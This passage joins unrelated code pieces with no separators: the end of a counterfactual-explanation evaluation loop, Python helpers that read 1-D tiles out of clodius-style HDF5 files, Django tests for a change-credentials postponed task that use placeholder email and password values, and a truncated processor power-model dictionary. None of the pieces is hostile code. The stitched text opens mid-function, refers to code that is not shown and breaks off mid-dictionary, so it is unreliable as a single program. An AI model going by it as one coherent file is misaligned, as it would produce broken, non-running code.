                    counterfactual_causal_dist.append(np.linalg.norm(x_cf - x_cf2, 1))

                    delta = np.round(delta, decimals=5)  # Avoid very small number like 10^-10 which are likely a numerical artefact from optimization
                    delta2 = np.round(delta2, decimals=5)
                except Exception as ex:
                    # NOTE(review): broad catch also hides programming errors
                    # (e.g. the NameError above) as "not found"
                    print(ex, y_target)
                    n_not_found += 1

        # Compute final evaluation
        print("Final evaluation")
        print(f"Dim: {X.shape[1]}")
        print(f"Not found: {n_not_found}")
        print(f"Wong classification: {n_wrong_classification}")

        # Compute some statistics for each metric
        print(f"=>Difference:\nMean: {np.mean(counterfactual_causal_dist)}\nMedian: {np.median(counterfactual_causal_dist)}\nVar: {np.var(counterfactual_causal_dist)}\nStd: {np.std(counterfactual_causal_dist)}")
        print(f"=>Overlap:\nMean: {np.mean(deltas_overlap)}\nMedian: {np.median(deltas_overlap)}\nVar: {np.var(deltas_overlap)}\nStd: {np.std(deltas_overlap)}")
"""Helpers for serving 1-D tiles out of clodius-style HDF5 files."""
import clodius.array as ct
import math
import numpy as np


def get_tileset_info(hdf_file):
    """
    Get information about the tileset.

    :param hdf_file: A file handle for an HDF5 file (h5py.File('...'))
    :return: dict with max_pos, min_pos, max_width, max_zoom and tile_size,
        read from the file's "meta" group attributes.
    """
    d = hdf_file["meta"]

    # Older files store only "max-length"; fall back to it when the explicit
    # min/max position attributes are absent.
    if "min-pos" in d.attrs:
        min_pos = d.attrs["min-pos"]
    else:
        min_pos = 0

    if "max-pos" in d.attrs:
        max_pos = d.attrs["max-pos"]
    else:
        max_pos = d.attrs["max-length"]

    return {
        "max_pos": max_pos,
        "min_pos": min_pos,
        "max_width": d.attrs["max-width"],
        "max_zoom": d.attrs["max-zoom"],
        "tile_size": d.attrs["tile-size"],
    }


def bisect_left(a, x, lo=0, hi=None, comparator=None):
    """Bisect_left with with an additional comparator.

    Based on the bisect_left function from the python bisect module.

    Return the index where to insert item x in list a, assuming a is sorted.

    The return value i is such that all e in a[:i] have e < x, and all e in
    a[i:] have e >= x.  So if x already appears in the list, a.insert(x) will
    insert just before the leftmost x already there.

    Optional args lo (default 0) and hi (default len(a)) bound the
    slice of a to be searched.

    Args:
        a (array): The array to bisect
        x (object): The object to find the insertion point of
        lo (int): The starting index of items to search in a
        hi (int): The end index of items to search in a
        comparator (function(a,b)): A way to compare objects
    """
    if lo < 0:
        raise ValueError("lo must be non-negative")
    if hi is None:
        hi = len(a)
    while lo < hi:
        mid = (lo + hi) // 2
        # comparator < 0 means a[mid] < x
        if comparator(a[mid], x) < 0:
            lo = mid + 1
        else:
            hi = mid
    return lo


def bisect_right(a, x, lo=0, hi=None, comparator=None):
    """Bisect_right with with an additional comparator.

    Based on the bisect_right function from the python bisect module.

    Return the index where to insert item x in list a, assuming a is sorted.

    The return value i is such that all e in a[:i] have e <= x, and all e in
    a[i:] have e > x.  So if x already appears in the list, a.insert(x) will
    insert just after the rightmost x already there.

    Optional args lo (default 0) and hi (default len(a)) bound the
    slice of a to be searched.

    Args:
        a (array): The array to bisect
        x (object): The object to find the insertion point of
        lo (int): The starting index of items to search in a
        hi (int): The end index of items to search in a
        comparator (function(a,b)): A way to compare objects
    """
    if lo < 0:
        raise ValueError("lo must be non-negative")
    if hi is None:
        hi = len(a)
    while lo < hi:
        mid = (lo + hi) // 2
        # comparator < 0 means x < a[mid]
        if comparator(x, a[mid]) < 0:
            hi = mid
        else:
            lo = mid + 1
    return lo


def get_discrete_data(hdf_file, z, x):
    """
    Get a discrete set of data from an hdf_tile file.

    Args:
        hdf_file (h5py.File): File handle for the file containing the information
        z (int): The zoom level of this tile
        x (int): The x position of this tile

    Returns:
        A 2D array of entries at that position. It is assumed that names of
        the columns are known.
    """
    # is the tile within the range of possible tiles?
    # FIX: valid tiles at zoom z are 0 .. 2**z - 1, so x == 2**z is also out
    # of range (was `x > 2 ** z`).
    if x >= 2 ** z:
        print("OUT OF RIGHT RANGE")
        return []
    if x < 0:
        print("OUT OF LEFT RANGE")
        return []

    d = hdf_file["meta"]
    tile_size = int(d.attrs["tile-size"])
    # max_length = int(d.attrs['max-length'])
    max_zoom = int(d.attrs["max-zoom"])
    # max_width = tile_size * 2 ** max_zoom

    # f is an array of data (e.g. [['34','53', 'x'],['48','57', 'y']] )
    # where the first two columns indicate the start and end points
    f = hdf_file[str(z)]

    # the tile width depends on the zoom level, lower zoom tiles encompass
    # a broader swatch of the data
    tile_width = tile_size * 2 ** (max_zoom - z)
    tile_start = x * tile_width
    tile_end = tile_start + tile_width

    # We need a way to compare data points that aren't numbers
    # (e.g. the arrays that are in f): compare on the start coordinate.
    def comparator_start(a, b):
        return int(a[0]) - int(b[0])

    # Both boundaries are searched on the start column: we return entries
    # whose *start* falls inside [tile_start, tile_end].  NOTE(review):
    # entries that start before tile_start but overlap into the tile are not
    # returned -- confirm that is intended.
    tile_data_start = bisect_left(f, [tile_start], comparator=comparator_start)
    tile_data_end = bisect_right(f, [tile_end], comparator=comparator_start)

    return f[tile_data_start:tile_data_end]


def get_data(hdf_file, z, x):
    """
    Return a tile from an hdf_file.

    :param hdf_file: A file handle for an HDF5 file (h5py.File('...'))
    :param z: The zoom level
    :param x: The x position of the tile
    :return: A 1-D numpy array of tile_size aggregated values (averages when
        NaN counts are stored in the file, sums/aggregates otherwise).
    """
    # is the tile within the range of possible tiles?
    # FIX: valid tiles at zoom z are 0 .. 2**z - 1 (was `x > 2 ** z`).
    if x >= 2 ** z:
        print("OUT OF RIGHT RANGE")
        return []
    if x < 0:
        print("OUT OF LEFT RANGE")
        return []

    d = hdf_file["meta"]

    tile_size = int(d.attrs["tile-size"])
    zoom_step = int(d.attrs["zoom-step"])
    max_zoom = int(d.attrs["max-zoom"])
    max_width = tile_size * 2 ** max_zoom

    if "max-position" in d.attrs:
        max_position = int(d.attrs["max-position"])
    else:
        max_position = max_width

    rz = max_zoom - z
    # tile_width = max_width / 2**z

    # because we only store some a subsection of the zoom levels, find the
    # closest stored level at or above this resolution and aggregate down
    next_stored_zoom = zoom_step * math.floor(rz / zoom_step)
    zoom_offset = rz - next_stored_zoom

    # the number of entries to aggregate for each new value
    num_to_agg = 2 ** zoom_offset
    total_in_length = tile_size * num_to_agg

    # which positions we need to retrieve in order to dynamically aggregate
    start_pos = int((x * 2 ** zoom_offset * tile_size))
    end_pos = int(start_pos + total_in_length)

    # rescale the data boundary into the stored zoom level's coordinates
    max_position = int(max_position / 2 ** next_stored_zoom)

    f = hdf_file["values_" + str(int(next_stored_zoom))]

    if start_pos > max_position:
        # we want a tile that's after the last bit of data
        a = np.zeros(end_pos - start_pos)
        a.fill(np.nan)
        ret_array = ct.aggregate(a, int(num_to_agg))
    elif start_pos < max_position and max_position < end_pos:
        # the tile straddles the end of the data: NaN-pad the tail
        a = f[start_pos:end_pos][:]
        a[max_position + 1 : end_pos] = np.nan
        ret_array = ct.aggregate(a, int(num_to_agg))
    else:
        ret_array = ct.aggregate(f[start_pos:end_pos], int(num_to_agg))

    # check to see if we counted the number of NaN values in the given
    # interval; if so, return per-bin averages instead of raw aggregates
    f_nan = None
    if "nan_values_" + str(int(next_stored_zoom)) in hdf_file:
        f_nan = hdf_file["nan_values_" + str(int(next_stored_zoom))]
        nan_array = ct.aggregate(f_nan[start_pos:end_pos], int(num_to_agg))
        num_aggregated = 2 ** (max_zoom - z)

        num_vals_array = np.zeros(len(nan_array))
        num_vals_array.fill(num_aggregated)
        num_summed_array = num_vals_array - nan_array

        averages_array = ret_array / num_summed_array
        return averages_array

    return ret_array
import smart_imports

smart_imports.all()


class PostponedChangeCredentialsTaskTests(utils_testcase.TestCase):
    """Lifecycle tests for the ChangeCredentials postponed task."""

    def setUp(self):
        super(PostponedChangeCredentialsTaskTests, self).setUp()
        game_logic.create_test_map()

        self.account = self.accounts_factory.create_account()

        self.task = prototypes.ChangeCredentialsTaskPrototype.create(self.account,
                                                                     new_email='<EMAIL>',
                                                                     new_password='<PASSWORD>',
                                                                     new_nick='test_nick',
                                                                     relogin_required=True)

        self.postponed_task = postponed_tasks.ChangeCredentials(task_id=self.task.id)

    def _run_change_credentials(self):
        """Drive self.task to completion and return the created postponed task.

        The first process() call sends the confirmation mail and yields None;
        the second one creates the postponed task, which is then processed.
        """
        self.assertEqual(self.task.process(logger=mock.Mock()), None)  # sent mail
        pending_task = self.task.process(logger=mock.Mock())  # create task
        pending_task.process(logger=mock.Mock())
        return pending_task

    def test_create(self):
        """A freshly built postponed task carries the right payload and state."""
        expected_data = {'next_url': dext_urls.url('accounts:profile:edited')}
        self.assertEqual(self.postponed_task.processed_data, expected_data)
        self.assertEqual(self.postponed_task.task_id, self.task.id)
        self.assertTrue(self.postponed_task.state.is_UNPROCESSED)

    def test_serialization(self):
        """serialize() round-trips through deserialize() unchanged."""
        serialized = self.postponed_task.serialize()
        restored = postponed_tasks.ChangeCredentials.deserialize(serialized)
        self.assertEqual(serialized, restored.serialize())

    def test_processed_view__real(self):
        """Processing with no active session leaves the visitor logged out."""
        pending_task = self._run_change_credentials()

        self.check_ajax_ok(self.client.get(dext_urls.url('postponed-tasks:status', pending_task.id)))
        self.assertNotIn('_auth_user_id', self.client.session)

    def test_processed_view__logout__same_user(self):
        """The affected account is logged out when relogin is required."""
        self.request_login(self.account.email)

        pending_task = self._run_change_credentials()

        self.check_ajax_ok(self.client.get(dext_urls.url('postponed-tasks:status', pending_task.id)))
        self.assertNotIn('_auth_user_id', self.client.session)

    def test_processed_view__logout__other_user(self):
        """An unrelated logged-in account keeps its session."""
        account_2 = self.accounts_factory.create_account()
        self.request_login(account_2.email)

        pending_task = self._run_change_credentials()

        self.check_ajax_ok(self.client.get(dext_urls.url('postponed-tasks:status', pending_task.id)))
        self.assertEqual(int(self.client.session.get('_auth_user_id')), account_2.id)

    def test_processed_view__real__without_relogin(self):
        """Without relogin_required no session is created for the visitor."""
        self.task._model.relogin_required = False
        self.task._model.save()

        pending_task = self._run_change_credentials()

        self.check_ajax_ok(self.client.get(dext_urls.url('postponed-tasks:status', pending_task.id)))
        self.assertEqual(self.client.session.get('_auth_user_id'), None)

    def test_process__wrong_state(self):
        """Processing an already-PROCESSED task errors out into WRONG_STATE."""
        self.postponed_task.state = postponed_tasks.CHANGE_CREDENTIALS_STATE.PROCESSED
        self.assertEqual(self.postponed_task.process(main_task=mock.Mock()), POSTPONED_TASK_LOGIC_RESULT.ERROR)
        self.assertTrue(self.postponed_task.state.is_WRONG_STATE)

    def test_process(self):
        """Successful processing applies the new credentials to the account."""
        self.assertEqual(self.postponed_task.process(main_task=mock.Mock()), POSTPONED_TASK_LOGIC_RESULT.SUCCESS)
        self.assertTrue(self.postponed_task.state.is_PROCESSED)
        self.assertEqual(django_auth.authenticate(nick='test_nick', password='<PASSWORD>').email, '<EMAIL>')
<reponame>TugberkArkose/MLScheduler power = {'BUSES': {'Area': 1.33155, 'Bus/Area': 1.33155, 'Bus/Gate Leakage': 0.00662954, 'Bus/Peak Dynamic': 0.0, 'Bus/Runtime Dynamic': 0.0, 'Bus/Subthreshold Leakage': 0.0691322, 'Bus/Subthreshold Leakage with power gating': 0.0259246, 'Gate Leakage': 0.00662954, 'Peak Dynamic': 0.0, 'Runtime Dynamic': 0.0, 'Subthreshold Leakage': 0.0691322, 'Subthreshold Leakage with power gating': 0.0259246}, 'Core': [{'Area': 32.6082, 'Execution Unit/Area': 8.2042, 'Execution Unit/Complex ALUs/Area': 0.235435, 'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646, 'Execution Unit/Complex ALUs/Peak Dynamic': 0.261644, 'Execution Unit/Complex ALUs/Runtime Dynamic': 0.408195, 'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111, 'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163, 'Execution Unit/Floating Point Units/Area': 4.6585, 'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156, 'Execution Unit/Floating Point Units/Peak Dynamic': 1.09451, 'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033, 'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829, 'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061, 'Execution Unit/Gate Leakage': 0.122718, 'Execution Unit/Instruction Scheduler/Area': 2.17927, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.754389, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066, 'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101, 'Execution Unit/Instruction Scheduler/Instruction 
Window/Area': 1.00996, 'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112, 'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911, 'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 1.30633, 'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117, 'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351, 'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781, 'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232, 'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399, 'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892, 'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.749216, 'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624, 'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339, 'Execution Unit/Instruction Scheduler/Runtime Dynamic': 2.80993, 'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878, 'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291, 'Execution Unit/Integer ALUs/Area': 0.47087, 'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291, 'Execution Unit/Integer ALUs/Peak Dynamic': 0.577878, 'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344, 'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222, 'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833, 'Execution Unit/Peak Dynamic': 8.1935, 'Execution Unit/Register Files/Area': 0.570804, 'Execution Unit/Register Files/Floating Point RF/Area': 0.208131, 'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788, 'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.206776, 'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0273472, 'Execution Unit/Register Files/Floating Point RF/Subthreshold 
Leakage': 0.00399698, 'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968, 'Execution Unit/Register Files/Gate Leakage': 0.000622708, 'Execution Unit/Register Files/Integer RF/Area': 0.362673, 'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992, 'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.308658, 'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.202249, 'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175, 'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675, 'Execution Unit/Register Files/Peak Dynamic': 0.515433, 'Execution Unit/Register Files/Runtime Dynamic': 0.229596, 'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387, 'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643, 'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632, 'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074, 'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.817524, 'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 1.82946, 'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413, 'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155, 'Execution Unit/Runtime Dynamic': 5.68256, 'Execution Unit/Subthreshold Leakage': 1.83518, 'Execution Unit/Subthreshold Leakage with power gating': 0.709678, 'Gate Leakage': 0.372997, 'Instruction Fetch Unit/Area': 5.86007, 'Instruction Fetch Unit/Branch Predictor/Area': 0.138516, 'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221, 'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362, 'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831, 'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00219219, 'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719, 'Instruction Fetch Unit/Branch 
Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236, 'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00219219, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00191502, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000744414, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045, 'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838, 'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732, 'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05, 'Instruction 
Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602, 'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00290533, 'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505, 'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733, 'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00920474, 'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703, 'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282, 'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954, 'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758, 'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867, 'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0208175, 'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682, 'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357, 'Instruction Fetch Unit/Gate Leakage': 0.0590479, 'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323, 'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05, 'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827, 'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.194427, 'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885, 'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682, 'Instruction Fetch Unit/Instruction Cache/Area': 3.14635, 'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931, 'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 6.43323, 'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.479605, 'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022, 'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386, 'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799, 
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493, 'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404, 'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.660362, 'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943, 'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104, 'Instruction Fetch Unit/Peak Dynamic': 8.96874, 'Instruction Fetch Unit/Runtime Dynamic': 1.36442, 'Instruction Fetch Unit/Subthreshold Leakage': 0.932587, 'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542, 'L2/Area': 4.53318, 'L2/Gate Leakage': 0.015464, 'L2/Peak Dynamic': 0.0235533, 'L2/Runtime Dynamic': 0.00587734, 'L2/Subthreshold Leakage': 0.834142, 'L2/Subthreshold Leakage with power gating': 0.401066, 'Load Store Unit/Area': 8.80969, 'Load Store Unit/Data Cache/Area': 6.84535, 'Load Store Unit/Data Cache/Gate Leakage': 0.0279261, 'Load Store Unit/Data Cache/Peak Dynamic': 6.90651, 'Load Store Unit/Data Cache/Runtime Dynamic': 2.73215, 'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675, 'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085, 'Load Store Unit/Gate Leakage': 0.0351387, 'Load Store Unit/LoadQ/Area': 0.0836782, 'Load Store Unit/LoadQ/Gate Leakage': 0.00059896, 'Load Store Unit/LoadQ/Peak Dynamic': 0.183418, 'Load Store Unit/LoadQ/Runtime Dynamic': 0.183418, 'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961, 'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918, 'Load Store Unit/Peak Dynamic': 7.77618, 'Load Store Unit/Runtime Dynamic': 3.82013, 'Load Store Unit/StoreQ/Area': 0.322079, 'Load Store Unit/StoreQ/Gate Leakage': 0.00329971, 'Load Store Unit/StoreQ/Peak Dynamic': 0.452278, 'Load Store Unit/StoreQ/Runtime Dynamic': 0.904556, 'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621, 'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004, 'Load Store 
Unit/Subthreshold Leakage': 0.591622, 'Load Store Unit/Subthreshold Leakage with power gating': 0.283406, 'Memory Management Unit/Area': 0.434579, 'Memory Management Unit/Dtlb/Area': 0.0879726, 'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729, 'Memory Management Unit/Dtlb/Peak Dynamic': 0.160515, 'Memory Management Unit/Dtlb/Runtime Dynamic': 0.160782, 'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699, 'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485, 'Memory Management Unit/Gate Leakage': 0.00813591, 'Memory Management Unit/Itlb/Area': 0.301552, 'Memory Management Unit/Itlb/Gate Leakage': 0.00393464, 'Memory Management Unit/Itlb/Peak Dynamic': 0.399995, 'Memory Management Unit/Itlb/Runtime Dynamic': 0.078881, 'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758, 'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842, 'Memory Management Unit/Peak Dynamic': 0.835993, 'Memory Management Unit/Runtime Dynamic': 0.239663, 'Memory Management Unit/Subthreshold Leakage': 0.0769113, 'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462, 'Peak Dynamic': 30.3597, 'Renaming Unit/Area': 0.369768, 'Renaming Unit/FP Front End RAT/Area': 0.168486, 'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731, 'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511, 'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.721394, 'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281, 'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925, 'Renaming Unit/Free List/Area': 0.0414755, 'Renaming Unit/Free List/Gate Leakage': 4.15911e-05, 'Renaming Unit/Free List/Peak Dynamic': 0.0401324, 'Renaming Unit/Free List/Runtime Dynamic': 0.047256, 'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426, 'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987, 'Renaming Unit/Gate Leakage': 0.00863632, 'Renaming Unit/Int Front End 
RAT/Area': 0.114751, 'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343, 'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945, 'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.384653, 'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897, 'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781, 'Renaming Unit/Peak Dynamic': 4.56169, 'Renaming Unit/Runtime Dynamic': 1.1533, 'Renaming Unit/Subthreshold Leakage': 0.070483, 'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779, 'Runtime Dynamic': 12.2659, 'Subthreshold Leakage': 6.21877, 'Subthreshold Leakage with power gating': 2.58311}, {'Area': 32.0201, 'Execution Unit/Area': 7.68434, 'Execution Unit/Complex ALUs/Area': 0.235435, 'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646, 'Execution Unit/Complex ALUs/Peak Dynamic': 0.10824, 'Execution Unit/Complex ALUs/Runtime Dynamic': 0.287705, 'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111, 'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163, 'Execution Unit/Floating Point Units/Area': 4.6585, 'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156, 'Execution Unit/Floating Point Units/Peak Dynamic': 0.46093, 'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033, 'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829, 'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061, 'Execution Unit/Gate Leakage': 0.120359, 'Execution Unit/Instruction Scheduler/Area': 1.66526, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.269111, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453, 'Execution 
Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519, 'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913, 'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223, 'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562, 'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763, 'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.434066, 'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755, 'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964, 'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262, 'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388, 'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608, 'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451, 'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.219102, 'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853, 'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446, 'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.922278, 'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892, 'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346, 'Execution Unit/Integer ALUs/Area': 0.47087, 'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291, 'Execution Unit/Integer ALUs/Peak Dynamic': 0.237117, 'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344, 'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222, 'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833, 'Execution Unit/Peak Dynamic': 5.16995, 'Execution Unit/Register Files/Area': 0.570804, 'Execution Unit/Register Files/Floating Point RF/Area': 0.208131, 'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788, 
